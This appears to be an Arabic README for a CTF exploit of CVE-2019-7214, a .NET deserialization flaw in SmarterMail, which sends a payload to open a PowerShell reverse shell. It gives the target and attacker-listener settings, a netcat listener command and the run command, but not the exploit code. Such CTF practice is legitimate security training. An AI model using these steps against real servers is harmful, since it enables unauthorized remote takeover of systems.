
للاستخدام في CTF فقط (CVE-2019-7214 يحل أيضًا اسم المضيف من /etc/hosts)
يستهدف هذا السكربت المكتوب بلغة بايثون خدمة ضعيفة تعمل على جهاز ويندوز بعيد. يقوم بإرسال حمولة .NET متسلسلة تُطلق صدفة عكسية تعتمد على PowerShell تعود إلى جهاز المهاجم.
تنفيذ عن بُعد للكود عبر إلغاء تسلسل .NET في نظام SmarterMail.
قم بتحديث قسم الإعداد في السكربت ليتوافق مع بيئتك:
HOSTNAME = 'hostname' # اسم المضيف الهدف (يتم حله عبر /etc/hosts)
PORT = 9999 # منفذ الهدف الذي يستمع للإدخال المتسلسل
LHOST = '192.168.45.185' # عنوان IP للمهاجم (المستمع)
LPORT = 4444 # منفذ الاستماع لدى المهاجم
nc -lvnp 4444
python3 CVE-2019-7214.py
إذا نجحت العملية، ستحصل على موجه PowerShell من الهدف على المستمع الخاص بك.
System.Management.Automation.هذا السكربت مُقدم لأغراض تعليمية فقط. الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها يُعد غير قانوني وغير أخلاقي.